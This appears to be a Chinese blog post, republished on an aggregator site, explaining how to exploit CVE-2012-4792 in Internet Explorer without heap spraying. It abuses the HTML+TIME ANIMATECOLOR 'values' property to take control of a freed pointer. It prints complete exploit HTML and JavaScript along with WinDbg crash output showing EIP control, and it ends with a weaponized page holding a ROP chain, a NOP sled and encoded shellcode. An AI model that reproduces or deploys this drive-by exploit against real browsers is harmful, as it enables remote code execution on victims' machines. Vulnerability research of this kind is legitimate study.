zoukankan      html  css  js  c++  java
  • CVE-2012-4792 Exploit Without HeapSpary

    前面的一篇用HeapSpary完成了在win7下绕过DEP及ASLR的利用,这次同样一CVE-2012-4792做为例子,前面读国外一篇文章:

    http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/

    文章提到用一种叫“HTML+TIME”的东西,通过该方法可以实现不需要Heap Spary就能完成exploit,具体说明如下:

    引用HTML+TIME的代码如下:
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
            <meta>
                    <?IMPORT namespace="t" implementation="#default#time2">
            </meta>
    .
    .
    .
        <t:ANIMATECOLOR id="myanim"/>
    接下来只需要构造ANIMATECOLOR的value属性,该属性可参考上面的最后一个知识库链接,构造如下:
    animvalues = "u4141u4141"
    while(animvalues.length < 0xDC) {
         animvalues += animvalues
    }
    for(i = 0; i < 21; i++) {
         animvalues += ";cyan";
    }
    最终产生的字符串如下形式:
    “u4141u4141....;cyan;cyan;cyan;cyan;”
    每个分号作为分隔符,这样一共22组,接下来将这个字符串通过以下方式赋值给ANIMATECOLOR的value属性:
    try {
         a = document.getElementById('myanim');
         a.values = animvalues;
    }
    catch(e) {}
    由于ANIMATECOLOR的特性,a.values会根据字符串的格式来申请堆空间,申请的空间大小取决于字符串被分号分割的项数,分配后的堆空间将用每一个项(分号分割的项)的地址来进行初始化,这里将会申请22*4个字节的堆空间,即0x58大小,每个DWORD保存每一项的地址,因此我们就控制了内存中一个指针,并能够控制该指针指向的数据,接下来就可以进行exploit了:
    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
         <?IMPORT namespace="t" implementation="#default#time2">
    </meta>
         <script>
         function helloWorld() {
              var e0 = null;
              var e1 = null;
              var e2 = null;
              animvalues = "u4141u4141"
         while(animvalues.length < 0xDC)
              {
              animvalues += animvalues
           }
         for(i = 0; i < 21; i++)
           {
              animvalues += ";cyan";
           }
              try {
                   e0 = document.getElementById("a");
                   e1 = document.getElementById("b");
                   e2 = document.createElement("q");
                   e1.applyElement(e2);
                   e1.appendChild(document.createElement('button'));
                   e1.applyElement(e0);
                   e2.outerText = "";
                   e2.appendChild(document.createElement('body'));
              } catch(e) { }
              CollectGarbage();
              try {
                   a = document.getElementById('myanim');
                   a.values = animvalues;
              }
              catch(e) {}
    
    
         }
    
         </script>
    </head>
    <body onload="eval(helloWorld())">
         <t:ANIMATECOLOR id="myanim"/>
         <form id="a">
         </form>
         <dfn id="b">
         </dfn>
    </body>
    </html>
    windbg挂载后的奔溃信息如下:
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
    eip=41414141 esp=020df830 ebp=020df8a4 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    41414141 ??              ???
    0:008> dd edi
    00216468  00199c60 02e1ebc0 0023f5c0 0023f5d8
    00216478  0023f578 0016bda0 0016bbd8 00187da0
    00216488  0333bce0 0333bcf8 0333bd10 0333bd28
    00216498  0333bd40 0333bd58 0333bd70 0333bd88
    002164a8  0333bda0 0333bdb8 0333bdd0 0333bde8
    002164b8  0333be00 0333be18 eaa84100 ff080000
    002164c8  000000fe 00000000 00000000 00000000
    002164d8  00000000 00000000 00000000 00000000
    0:008> dc poi(edi)
    00199c60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c80  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199c90  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199ca0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cb0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cc0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    00199cd0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
    0:008> dc poi(edi+4)
    02e1ebc0  00790063 006e0061 02e80000 00000000  c.y.a.n.........
    02e1ebd0  eaf06f92 ff080167 02e235dc 001f9038  .o..g....5..8...
    02e1ebe0  02e8e12c 00000000 eaf06f95 ff0c0100  ,........o......
    02e1ebf0  6359d910 00000001 001f9028 00000000  ..Yc....(.......
    02e1ec00  eaf06f68 ff0c010a 00000000 00000000  ho..............
    02e1ec10  00000001 00000000 eaf06f6b ff080100  ........ko......
    02e1ec20  0021cfd0 001f9038 02e1eb78 00000000  ..!.8...x.......
    02e1ec30  00000000 00000000 00000000 00000000  ................
    0:008> dc poi(edi+8)
    0023f5c0  00790063 006e0061 00200000 00000000  c.y.a.n... .....
    0023f5d0  eaabd9a2 ff0e0100 00790063 006e0061  ........c.y.a.n.
    0023f5e0  00200000 00000000 eaabd9a5 ff080100  .. .............
    0023f5f0  00148098 00000001 1690030b 01700d8c  ..............p.
    0023f600  eaabd9d8 ff080100 0063006e 006c0061  ........n.c.a.l.
    0023f610  00700072 00000063 eaabd9db ff0c0100  r.p.c...........
    0023f620  00000002 50000001 50000007 02db1318  .......P...P....
    0023f630  eaabd9de ff0a0100 0074006e 00760073  ........n.t.s.v.
    可以看到edi指向一块大小为0x58的堆空间,指向前面分配的字符串。这样我们就可以控制一个指针以及指针中的数据了,用前一篇文章用的ROP链,
    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
         <?IMPORT namespace="t" implementation="#default#time2">
    </meta>
         <script>
         location.href = 'ms-help://'
         function helloWorld() {
              var e0 = null;
              var e1 = null;
              var e2 = null;
              animvalues = 
              "u34b4u51bfu10b8u51bdu2d97u51bducba0u51bd"+
              "u79e2u51c3u9683u51c5u6fbdu51c5ufffeua17f"+
              "u1e01u51c1u92d8u51c3ue67du51bfu6fbdu51c5"+
              "ufc3dua17fu1e01u51c1u592bu51bfucf3eu51be"+
              "ud150u51c5uf563u51beu7402u51c0u6fbdu51c5"+
              "u9090u9090ua8dcu51bd"+               //ROP End
              "u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u9090u9090"+
              "u9090u9090u9090u9090u9090u9090u4a41u51be"+
              "u9090u9090"+
              "uc481uf254uffffu2ebfue4edudbc0ud9c8u2474" +
              "u58f4uc933u33b1u7831u0312u1278uee83u06e9" +
              "u1235u4f19ueab6u30dau0f3eu62ebu4424ub35e" +
              "u082eu3853ub862u4ce0ucfabufa41ufe8duca52" +
              "uac11u4c91uaeeeuaec5u61cfuae18u9f08ue2d3" +
              "ud4c1u1346ua865u125aua7a9u6ce3u77ccuc697" +
              "ua7cfu5c08u5f87u3a22u5e38u58e7u2904uab8c" +
              "ua8feue244u9bffua9a8u14c1ub325u9206uc6d6" +
              "ue17cud16bu9846u54b7u3a5buce33ubbbfu8990" +
              "ub734udd5dudb13u3260ue728ub5e9u6effu91a9" +
              "u2bdbubb69u917auc4dcu7d9du6080u6fd5u13d5" +
              "ue5b4u9128u40c2ua92aue2ccu9843u6d47u2513" +
              "uca82u6febu7a8fu3664u3f45uc9e9u03b3u4a14" +
              "ufb36u52e3ufe33ud4a8u72afub0a0u21cfu90c1" +
              "ua4b3u7851u431au1bd2u4162";
    
         for(i = 0; i < 21; i++)
           {
              animvalues += ";cyan";
           }
              try {
                   e0 = document.getElementById("a");
                   e1 = document.getElementById("b");
                   e2 = document.createElement("q");
                   e1.applyElement(e2);
                   e1.appendChild(document.createElement('button'));
                   e1.applyElement(e0);
                   e2.outerText = "";
                   e2.appendChild(document.createElement('body'));
              } catch(e) { }
              CollectGarbage();
              try {
                   a = document.getElementById('myanim');
                   a.values = animvalues;
              }
              catch(e) {}
    
    
         }
    
         </script>
    </head>
    <body onload="eval(helloWorld())">
         <t:ANIMATECOLOR id="myanim"/>
         <form id="a">
         </form>
         <dfn id="b">
         </dfn>
    </body>
    </html>

    这样就可以不通过HeapSpary完成漏洞的利用。

  • 相关阅读:
    关于update set from,第一次碰到,汗!
    列表CheckBox全选 结合DataGrid 进行删除操作
    DataBinder.Eval的基本格式 效率 比较
    [转载](c#)数据结构与算法分析 栈与队列
    [转载]怎样设计递归算法
    Java httpclient.CloseableHttpClient跳过https证书验证
    LeetCode129求根节点到叶节点数字之和
    LeetCode117填充每个节点的下一个右侧节点指针 II
    LeetCode131分割回文串
    LeetCode130被围绕的区域
  • 原文地址:https://www.cnblogs.com/Lamboy/p/3879089.html
Copyright © 2011-2022 走看看